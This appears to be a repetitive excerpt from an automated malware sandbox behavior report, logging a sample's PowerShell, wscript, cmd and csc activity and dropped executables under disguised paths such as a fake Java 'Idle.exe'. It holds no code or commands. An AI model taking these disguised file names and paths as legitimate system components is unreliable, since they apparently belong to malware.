Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process information set: NOOPENFILEERRORBOX
